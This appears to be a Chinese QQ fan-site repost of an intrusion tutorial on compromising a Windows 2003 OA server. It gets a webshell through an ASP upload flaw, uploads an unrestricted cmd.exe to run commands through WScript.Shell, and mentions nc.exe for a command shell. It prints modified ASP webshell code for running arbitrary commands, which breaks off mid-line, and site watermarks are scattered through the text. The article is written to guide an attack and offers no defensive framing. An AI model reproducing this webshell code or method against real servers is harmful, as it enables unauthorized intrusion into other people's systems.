首 页 | Q宠爱好者论坛 | 生日解码 | 绥宁影院 | 幽默笑话 | QQ表情
QQ宠屋[QQ非主流资源网]
  • 首 页
  • QQ 表情
  • QQ 头像
  • QQ 宝典
  • QQ 签名
  • 热门网游
  • QQ 空间
  • QQ非主流
设为首页 收藏本站
  • 热点通告:
  • Flash模块 |
  • FD模块 |
  • MTV模块 |
  • 大图模块 |
  • QQ空间教程 |
  • QQ空间日志
  • QQ个性签名 |
  • QQ个性资料 |
  • QQ繁体网名 |
  • QQ情侣网名 |
  • QQ个性图片
  • QQ游戏 |
  • 劲舞团 |
  • 跑跑卡丁车 |
  • 其他游戏
  • 动漫卡通 |
  • 明星头像 |
  • 游戏人物 |
  • 另类头像 |
  • 其他头像
  • 搞笑幽默 |
  • 节日生日 |
  • 情感爱情 |
  • 文字字母 |
  • 人物类 |
  • 其他类
  • QQ技巧 |
  • QQ黑客 |
  • QQ新闻 |
  • QQ宠物 |
  • QQ笑话
  • QQ非主流专题
您的位置:首页 >> QQ宝典 >> QQ黑客 >> 阅读资讯

利用QQ文件共享漏洞入侵 Windows2003

添加日期: 07-08-21 编辑: 会飞的坦克 点击: 【大 中 小】
        

服务器上运行的第三方软件历来就被攻击者们看作是入侵目标系统的捷径。现在,著名的腾讯QQ又被列入了这些捷径名单,好在QQ并不是服务器必备的软件之一,所以相信不会造成大范围的危机。文中遇到特殊情况虽然不多,但大家还是应该遵照“可能的就应该防范”的原则做出相应防御。 Wtto.Net

 一、在Windows2003中得到的Webshell

Qkoo.Cn

  此次渗透的目标是一台OA办公系统服务器。其操作系统新近升级到了Windows2003,但OA仍存在asp文件上传漏洞,所以webshell的取得并没有任何悬念。阻碍是在权限提升时遇到的。 Wtto.Net

  登陆webshell后发现只能查看服务器的D盘,对C盘不能进行任何访问,webshell的提示是“没有权限”。这点早在意料之中,因为 wenshell只有guests组权限,再加上win2003默认禁止了“Everyone"匿名用户及“Guest"组权限用户访问cmd.exe,还造成了不能通过webshell运行cmd.exe。 Wtto.Net

  唯一值得庆幸的是利用Webshell 可以对D盘(存放有web虚拟目录)各个子目录进行读写。这里除了web虚拟目录还有一些数据备份文件和一个腾讯QQ安装目录Tencent。

Wtto.Net

  二、破解Serv-u的终极防范

Wtto.Net

  Windows2003的种种默认安全配置展示了它强大的一面,近一步提升现有权限似乎已不太可能,直到我试图从系统入手向这台服务器发出FTP链接请求并看到Serv-u的banner时才觉得又有了一线希望。

Wtto.Net

  前面提到由于Windows2003对cmd.exe的权限限制,通过webshell方式不能运行cmd.exe,这样的论断在2004年6 期的防线的《构建Windows2003堡垒主机》一文也曾提到,但实践表明这并不正确,通过webshell上传本地非2003系统中未受限制的 cmd.exe文件到可执行目录,再通过wscript组件,同样能够通过webshell方式在Windows2003下获得相应权限的 cmd.exe。结合nc.exe,甚至还能得到一个guest组权限的命令行下的shell。 Wtto.Net

  为此,我对老兵的站长助手6.0做了一些改进,增加了如下代码,使其能够利用Wscript.shell组件运行本地上传的cmd.exe。 Qkoo.Cn


Function CmdShell() 
If Request("SP")<>"" Then Session("ShellPath") = Request("SP") 
ShellPath=Session("ShellPath") 
if ShellPath="" Then ShellPath = "cmd.exe" 
if Request("wscript")="yes" then 
checked=" checked" 
else 
checked="" 
end if 
If Request("cmd")<>"" Then DefCmd = Request("cmd") 
SI="<form method='post'><input name='cmd' Style='width:92%' class='cmd' 
value='"DefCmd&"'><input type='submit' value='运行'>" 
SI=SI&"<textarea Style='width:100%;height:500;' class='cmd'>" 
If Request.Form("cmd")<>"" Then 
if Request.Form("wscript")="yes" then 
Set CM=CreateObject(ObT(1,0)) 

Wtto.Net


Set DD=CM.exec(ShellPath&" /c "DefCmd) 
aaa=DD.stdout.readall 
SI=SI&aaa 
else%> 
<object runat=server id=ws scope=page classid="clsid:72C24DD5-D70A-438B-8A42-
98424B88AFB8"></object> 
<object runat=server id=ws scope=page classid="clsid:F935DC22-1CF0-11D0-ADB9-
00C04FD58A0B"></object> 
<object runat=server id=fso scope=page classid="clsid:0D43FE01-F093-11CF-8940-
00A0C9054228"></object> 
<%szTempFile = server.mappath("cmd.txt") 
Call ws.Run (ShellPath&am
9 7 3 1 2 3 4 8 :
Tags:

内容搜索
热门关键字:非主流 QQ个性 QQ签名 个性签名 情侣网名 繁体网名 flash代码 空间代码 表情
相关文章
  1. 小僵尸表情
  1. 裸宝宝系列表情
  1. 可爱小鸡表情
  1. QQ改版表情
  1. 兔耳控表情
  1. 另类非主流女孩图片
  1. 寂寞颓废的盛开
  1. 非主流怀旧风格图片
  1. 超个性非主流形象图
  1. 2008最新个性非主流图片
  1. 非主流颓废文字图片
  1. 非主流[十八禁接吻图]
推荐文章
  1. 2008最新中秋节祝福
  1. 父亲节祝福-QQ表情及祝福短信
  1. 端午节(粽子)祝福-QQ表情
  1. 六一儿童节-QQ表情
  1. 抗震救灾祈福-QQ,MSN头像
  1. 2008最新的免费QQ秀,最新15套时尚,经典情侣套装
  1. 正版中国心QQ头像 MSN头像
  1. 《我的中国心》百家姓头像大集合
  1. 十字架系列QQ头像
  1. 可爱的动态图片
  1. 最新免费qq秀4套 男女各两套[推荐]
  1. QQ无法正常登录的八种原因及解决办法
首 页 | Q宠爱好者论坛 | 生日解码 | 绥宁影院 | 幽默笑话 | QQ表情
E-mail:yuanchang402#163.com(请把“#”改成“@”) OICQ: 点击这里给我发消息
Copyright© 2006-2009 QQchw.Com Inc. All Rights Reserved     网站ICP备案号:湘ICP备06001204号